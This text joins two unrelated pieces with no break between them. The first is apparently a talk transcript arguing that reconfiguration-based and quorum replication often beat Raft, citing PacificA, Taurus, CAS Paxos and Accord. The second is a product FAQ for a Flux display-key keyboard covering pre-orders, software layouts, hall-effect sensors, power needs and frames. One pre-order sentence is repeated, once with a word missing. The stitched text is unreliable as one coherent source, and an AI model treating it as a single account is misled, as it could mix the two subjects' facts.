This is the reconfiguration counter-argument I have encountered the most often, and this is my least favorite argument, because it’s like a matryoshka of misunderstandings.
First, If you’re so upset about unavailability, what happens when the leader dies in raft? Request processing halts, there’s a timeout, a reconfiguration process (leader election), and requests resume.
What happens when you use reconfiguration and a replica dies? Request processing halts, there’s a timeout, a reconfiguration process, and requests resume. It’s literally the same diagram. I just deleted some nodes. If you’re upset about this slide, you
have to
be equally upset about the last slide too.
Furthermore, if we’re talking about replicating partitions of data, then leadership gets distributed across every machine to balance resource usage as leaders do more work. So when a machine fails, some percentage of your data is going to be "unavailable", we’re only arguing about exactly what that percent is. So, no.
Furthermore, it’s an argument based out of a bad definition of the word availability. Unavailability is when requests have latency above a given threshold. If the reconfiguration process happens within your latency threshold, it’s not unavailability.
The
Huawei Taurus paper
has an argument for reconfiguration-based replication in this vein, which is a bold argument and I love it.
They’re building replication for a write ahead log, and are making a case here about their write availability for appending a new log segment.
They say:
We can identify a failure quickly.
Our reconfiguration process is fast.
The chance of us being unable to find 3 new working nodes is effectively 0.
Therefore our change of being unavailable is effectively 0%.
And that’s the correct way to look at availability. You can hate this argument, you can still poke some minor holes in it, but they’re not wrong.
There is a correct counter-argument here, and it’s that you cannot solve consensus with two failures using three nodes. So when raft is electing a new leader or changing its replicas, it can do that itself. Reconfiguration-based replication needs some external consensus service to lean on. But the options of what you can use for that are ever more plentiful. With S3 supporting compare-and-swap now, you can even use S3 as your consensus service. But this is a design requirement difference from Raft.
For concrete advice on how to build systems using an external consensus service to manage membership, the
PacificA paper
gives a very nice description of how to do this, and how manage an automatic failover and reconfiguration process safely. It has already been directly adopted Elasticsearch, and Kafka’s replication is very similar in spirit.
Moving onto the Quorums side, one could argue "Raft is better than Quorums because Quorums livelock on contention!"
Simple majority quorums doesn’t livelock, so we’re talking about leaderless consensus here only, and this is a known concern. But there’s ways to minimize or work around this issue.
[2]
[2]: Unmentioned in this talk is "just put the replicas closer together", like
Tencent’s PaxosStore
, because that’s not as general of advice.
First, don’t keep the raft mental model that operations need to go into a log, and all operations need to go into
one
log. Target your operations to the specific entity or entities that you’re modifying, so that you contend only on what you actually need to.
You don’t even need to materialize a log if you don’t need a log.
Compare-and-Swap Paxos
, just models evolving your entity from one state to the new state with no “put things into a log” step in-between. And it’s a great example of being simpler than Raft — Denis’s example implementation with membership changes is 500 lines of code.
If you’re looking for a weekend implement consensus project, this is what I’d recommend doing.
Second, and this is the trick I see applied the least often, but remember that even when modifying the same entity, you don’t need to have all replicas agree on an ordering for commutative operations — those which yield the same result regardless of what order they’re performed in. Increments are the easiest example. Every replica agrees that at the end it’s a net plus six here, and this is safe to do as long as no one sees an intermediate result.
Permitting commutative operations to commit concurrently while banning reads requires cooperation from your concurrency control layer too. You can read about increment locks in database textbooks, but
escrow transactions
is the most fun. If I try to deposit $100 and withdraw $100 from my bank account, those might be commutative operations. If I have
zero
dollars, it matters if the withdrawal gets ordered before the deposit. If I’m a billionaire, it doesn’t matter. Escrow Transactions pitches how to handle even these sorts of "conditionally commutative" situations so that you can get your contention down as low as possible.
Lastly, the livelock stems from inconsistent ordering of requests across replicas, and you can also take a dependency on physical clocks to help consistently order requests instead. There’s an
E-Paxos Revisited
[3]
paper which gives a focused pitch on this idea as well, but I’d strongly suggest checking out
Accord
, Cassandra’s new strictly serializable transaction protocol, that’s an industry implementation of leaderless consensus, and avoiding livelock by leaning on a physical time based ordering.
[3]: E-Paxos is the classic example of targeting only the entities one wishes to modify within paxos, but there’s aspects of it which haven’t been fully scoped out for real-world implementation. Most of these are centered around that E-Paxos maintains a DAG of operations (where edges are conflicts) which makes a number of aspects of a real system (e.g. replica catchup or garbage collection) significantly harder to do efficiently. I only know of Cassandra having an implementation of it which was never merged, and they ended up going towards extending E-Paxos into Accord instead.
So to wrap this up, I’m not here to pitch you that Raft
never
has a use. Going through these arguments was to show that there are limitations to Quorums and Reconfiguration, and talk about how you can best work around those limitations. But each side has a critical flaw, and the one advantage that Raft uniquely has, is its unrelenting, unwavering mediocrity. It is less efficient, it is less “available”, and it is more complicated, but there’s no situation in which Raft isn’t an “okay” solution. It’s a safe choice. But, broadly, categorically, and littered with minor factual issues, not using raft gets you a system thats’s better at something.
So the mental model I’d like to leave you with is:
Use Quorums or Raft if you can’t have any other supporting service to help with group membership.
Use Reconfiguration or Raft if you must handle high, single-item contention.
If you need both of these things, then you might have to use Raft. But using Raft is your punishment. You’re forced to use a resource in-efficient, complex solution, because your design constraints left you with no wiggle room.
Please use the replication algorithm that best fits your use case. It’s possible that is Raft. That’s fine. But reconfiguration is 40% cheaper by instance count than Raft. If I go to your database’s users and ask if they’re fine with slightly higher tail latency in exchange for 40% off their hardware cost, how many are going to say no? Or if tail latency is really that important to them, would they not be happier with Quourms? Use what fits your users' needs the best.
If you’re interested in some further food for thought here, looking at
disaggregated OLTP systems
is a really interesting replication case study. Each of the major vendors chose a completely different replication solution, and so if you read through the series of papers you see what effects those choices had, and get to read the criticisms that the later papers had of the earlier ones' decisions.
Pre-orders on this website will ship according to your selected batch. In stock orders will become available after pre-orders have been fulfilled.
Pre-orders on this website will ship according to your selected batch. In stock orders will become after pre-orders have been fulfilled.
The keyboard features a USB-C port on both sides of the device to add on any peripheral such as an external numpad if desired. We plan to release a matching numpad add-on in the future.
Any pre-existing hotkey bindings will function in
any software
and a custom layout can be made to support it. By
default
the following layouts will be included at launch with more to come over time:
Adobe Photoshop
Adobe Illustrator
Adobe After Effects
Adobe Premiere Pro
Adobe Lightroom
Ableton Live
Autodesk 3ds Max
Autodesk Fusion 360
Autodesk Maya
Blender
Cinema 4D
Davinci Resolve
Discord
Figma
Final Cut Pro
FL Studio
Jetbrains IntelliJ
Logic Pro
Microsoft Excel
Microsoft Outlook
Microsoft Powerpoint
OBS Studio
SolidWorks
Steinberg Cubase
Unity
Unreal Engine 4/5
Visual Studio Code
Microsoft Visual Studio
Windows 10/11
macOS 11+ (Note: application volume mixing not available for macOS)
Linux / Android / iOS – Limited compatibility (see FAQ regarding operation without installed software)
Full Linux compatibility is planned but may not be available at launch.
In order to customise and configure the keyboard, the provided Flux Polymath software must be used. However, once a configuration is loaded onto the keyboard’s on-board memory it can be used even on computers that do not have the Flux Polymath software installed. Shortcuts and custom macros consisting of combination keypresses will also still function as well as manual switching between profiles. However, more advanced functionality such as automatic layout switching based on the active window and certain application specific features such as album art and track information for music will not be available if the utility is not installed.
Due to the position of the sensors ortho layouts will not be available. We hope to do a separate ortho split model in the future and the best way to make that happen is to let people know about this product.
Analog hall effect sensors are the best type of sensors for gaming as they allow for adjustable actuation point and rapid trigger functionality which provides some advantages for rapid direction changes or in rhythm games. Polling rate is 1000hz with 1-2ms latency, however the performance may exceed higher polling keyboards as most real world latency comes from the key travel time and debounce.
The keys contain magnets along their perimeter which are attracted by magnets in the frame which surrounds them. This magnetic attraction suspends them in place and provides the return force which makes the key bounce back after depressing – similar to a spring.
No, the keyboard does not function as a touchscreen. This means there is no accidental actuation from resting fingers on the keys.
No, the keyboard is not recognised as a display device by the host computer operating system. It is driven by its own independent efficient embedded microprocessor to provide a more seamless user experience and compatibility with more devices. Also your mouse cursor will never get lost on your keyboard.
No, there is a mechanical end stop built into the frame which prevents keys from hitting the screen.
You will need 1x USB-A or USB-C 2.0 with a minimum power delivery of 5V 1.5A. If you plan to use additional peripherals connected to the keyboard 5V 3A is recommended. The keyboard features a USB-C receptacle for removable cable. If your computer’s USB ports are unable to provide this, a 5V 3A USB-C power supply/charger (sold separately) can be used along with the included USB Y cable.
Yes you can play video files on this, there is 8GB of inbuilt storage for wallpapers and icons. You can easily fit a few 1080p feature length films.
The removable frame allows easy access to the gaps under the keys where dirt generally gathers on a normal keyboard, making cleaning much easier. The frame itself is also totally passive with no electronics within it.
The Flux Keyboard is infinitely customisable, any image or video can be used as a wallpaper with some interactive styles as well. The key legends/symbols and mapping are also completely customisable with support for macros.
Frames will be available in:
ANSI 84 Key layout
ISO 85 Key layout
The keyboard’s base is compatible with any frame, so it is possible to swap between these layouts if you wanted to.
At launch two switch types will be available:
Tactile 55g
Linear 45g
The weight can be modified by changing the magnets to magnets of a different strength grade and more varieties are planned to be made available in the future.